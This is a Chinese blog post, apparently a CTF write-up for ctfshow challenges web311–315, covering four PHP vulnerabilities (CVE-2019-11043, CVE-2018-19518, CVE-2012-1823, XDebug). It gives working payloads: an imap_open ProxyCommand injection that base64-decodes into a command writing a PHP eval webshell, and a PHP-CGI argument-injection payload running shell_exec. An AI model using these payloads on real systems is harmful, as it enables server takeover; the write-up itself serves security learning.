web311~web315phpCVE

最新推荐文章于 2024-08-14 21:12:43 发布
最新推荐文章于 2024-08-14 21:12:43 发布
阅读量157 收藏
点赞数
文章标签: web3
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pandasaymmm/article/details/129913855
版权

web311:cve-2019-11043

影响范围:

在 Nginx + PHP-FPM 环境下

PHP 5.6版本也受此漏洞影响,但目前只能 Crash,不可以远程代码执行:

PHP 7.0 版本、PHP 7.1 版本、PHP 7.2 版本、PHP 7.3 版本

 漏洞分析

poc

 

web312 PHP imap 远程命令执行漏洞(CVE-2018-19518)

漏洞介绍

poc:

hostname=x+-oProxyCommand%3decho%09通过base64加密过的执行语句|base64%09-d|sh}

本题payload:

先对一句话base64,再用echo解码

echo "一句话" | base64 -d >/var/www/html/shell.php

hostname=x+-oProxyCommand%3decho%09ZWNobyAiUEQ5d2FIQWdRR1YyWVd3b0pGOVFUMU5VVzIxdGJWMHBPejgrIiB8IGJhc2U2NCAtZCA+L3Zhci93d3cvaHRtbC9zaGVsbC5waHA%3D|base64%09-d|sh}

=要url编码

 web313:CVE-2012-1823

 漏洞分析

通过阅读源码,我发现cgi模式下有如下一些参数可用:

  • -c 指定php.ini文件的位置
  • -n 不要加载php.ini文件
  • -d 指定配置项
  • -b 启动fastcgi进程
  • -s 显示文件源码
  • -T 执行指定次该文件
  • -h-? 显示帮助

 -d的用法

<?php echo shell_exec('ls');?>
 
?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input

 

web315:XDebug 远程调试漏洞

hint

debug开启,端口9000

vulnhub上有exp

熊猫叫喵喵喵
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ctfshow phpCVE web311~315
shinygod的博客
10-07 683
php imap扩展用于在PHP中执行邮件收发操作。其imap_open函数会调用rsh来连接远程shell,而debian/ubuntu中默认使用ssh来代替rsh的功能(也就是说,在debian系列系统中,执行rsh命令实际执行的是ssh命令)。因为ssh命令中可以通过设置-oProxyCommand=来调用第三方命令,攻击者通过注入注入这个参数,最终将导致命令执行漏洞。
ctfshow web入门phpcve web311-315
m0_62207170的博客
04-24 489
ctfshow web入门phpcve web311-315
CTFSHOW-phpCVE Writeup
weixin_59419135的博客
11-25 1321
ctfshow phpCVEweb311,web312,web313,web314,web315CVE-2019-11043,CVE-2018-19935,CVE-2012-1823,PHP_SESSION_UPLOAD_PROGRESS文件包含, XDebug 远程调试漏洞
ctf_show笔记篇(web入门---phpCVE
whale_waves的博客
03-22 1238
CVE-2019-11043漏洞是PHP的一个远程代码执行漏洞,该漏洞产生与Nginx利用fastcgi_split_path_info在处理带有 %0a 的请求时,会因为遇到换行符(%0a)导致PATH_INFO为空,最终可导致任意代码执行。头指定的地址)并通过dbgp协议与其通信,我们通过dbgp中提供的eval方法即可在目标服务器上执行任意PHP代码。x+-oProxyCommand=echo 'base64编码后的命令'|base64 -d|sh}漏洞名称:PHP-CGI远程代码执行漏洞。
ctf.show的phpCVE(web311-web315)
wanan的博客
09-30 296
ctf.show的phpCVE(web311-web315)
Web设计购物网站程序源码下载
06-05
Web设计购物网站程序源码是开发在线电子商务平台的基础,它涉及到多个技术和概念。在这个项目中,我们使用Eclipse作为集成开发环境(IDE)来编写和管理源代码。Eclipse是一款强大的开源工具,广泛用于Java应用的开发...
ntko插件web版,插件
03-02
NTKO(New Technology Kernel Object)插件是一款专为Web应用设计的软件组件,它主要功能是提供文档在线预览、编辑、转换以及签名等服务。这个插件在Web环境中为用户提供了与桌面应用相似的文档处理能力,极大地提升...
web工具箱 web工具箱
04-19
web工具箱web工具箱web工具箱web工具箱web工具箱web工具箱web工具箱web工具箱web工具箱web工具箱web工具箱web工具箱web工具箱web工具箱web工具箱web工具箱web工具箱web工具箱web工具箱web工具箱web工具箱web工具箱...
web网页制作期末大作业
11-17
总的来说,这个"web网页制作期末大作业"旨在考察学生对Web前端基础知识的掌握程度,以及实际应用这些知识解决问题的能力。通过这个项目,学生不仅能提升技术技能,还能培养良好的项目管理和团队协作习惯。
Web中间件常见漏洞总结.pdf
06-14
Web中间件是企业级Web应用程序运行的基础环境,常见的中间件产品包括IIS、Apache、Tomcat等。中间件的安全问题常常成为黑客攻击的目标,因此深入理解和掌握Web中间件常见漏洞的知识对于网络安全防护至关重要。下面,...
ctfshow phpCVE web311-web315 wp
mumuzi的博客
02-04 1906
ctfshow-php-CVE-wp----------
CTFshow刷题日记-WEB-PHPCVE(web311-315)包括PHP-fpm远程代码执行,PHPimap_open函数任意命令执行,PHP-CGI远程代码执行,XDebug 远程调试漏洞
Love&Share
10-03 3067
web311-CVE-2019-11043-PHP-fpm远程代码执行漏洞 提示:似曾相识,就这一个文件,不用扫描 注释中只有一个<!-- cve-->用burp抓包发现响应行中的X-Powered-By字段很可疑 谷歌之后发现该PHP版本存在漏洞:PHP 远程代码执行漏洞(CVE-2019-11043 漏洞原理 CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码 向Nginx + PHP-FP
CVE-2019-11043 PHP-FPM 复现和学习(环境CTFShow web311
paidx0
08-09 480
CVE-2019-11043复现和学习 漏洞描述 CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。 向Nginx + PHP-FPM的服务器 URL发送 %0a 时,服务器返回异常。 该漏洞需要在nginx.conf中进行特定配置才能触发。 location ~ [^/]\.php(/|$) { ... fastcgi_split_path_info ^(.+?\.php)(/.*)$; fastcg
Web3时代的社交媒体:去中心化平台的兴起与挑战
Roun3的博客
08-13 490
Web3时代的社交媒体正在经历前所未有的变革。去中心化平台通过区块链技术为用户提供了更高的数据安全性和隐私保护,同时也带来了新的挑战。尽管面临技术、教育、监管和安全等问题,去中心化社交平台的优势使其成为未来社交媒体的重要趋势。随着技术的成熟和用户的逐渐接受,去中心化平台有望在未来继续推动社交媒体的发展,为用户带来更加自由和公平的社交体验。
IPFS、IPNS 网站部署
最新发布
Willin Wang 的全栈升级指南
08-14 280
注意:如果没有你使用的框架,选择 Others,然后手动输入 build 命令(注意是要生成为静态站点~)。添加域名绑定并在 DNS 解析处增加 CNAME 别名解析。大部分情况下免费版本即可够用。
Web3:下一代互联网的构建者
weixin_44672358的博客
08-14 940
Web3代表了互联网发展的新阶段,它通过去中心化技术、区块链基础设施和去中心化应用,重塑了互联网的面貌。尽管面临挑战,Web3的潜力巨大,将为未来的互联网带来更加安全、公正和透明的网络环境。随着技术的不断成熟和应用的广泛推广,Web3有望成为全球数字经济和社会发展的重要推动力。
NFT合约:在 ERC721 上 Safe Mint 并在 OpenSea 上进行售卖
Willin Wang 的全栈升级指南
08-13 335
在 Script 目录下创建。注意这一步也是需要手续费的。看到对应的输出,即为完成。接上文演示项目继续。
去中心化技术的崛起:探索Web3的新时代
dd8989089的博客
08-13 931
Web3代表了互联网发展的未来,通过去中心化技术和创新应用,推动了数字社会的变革。虽然面临技术、法律和用户教育等挑战,但Web3的潜力巨大,为未来的数字世界奠定了坚实的基础。随着技术的不断进步和应用的广泛推广,Web3有望在未来成为互联网的主流模式,为全球用户带来更多的机会和价值。
SAP NetWeaver Web Dynpro ABAP高级编程教程(NET311
SAP标准教材《NET311 Web Dynpro for ABAP高级编程》是一本专为深入理解SAP NetWeaver技术平台而设计的专业培训教材。该课程针对的是SAP NetWeaver的高级开发人员,特别是那些希望在Web Dynpro技术上提升技能的ABAP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值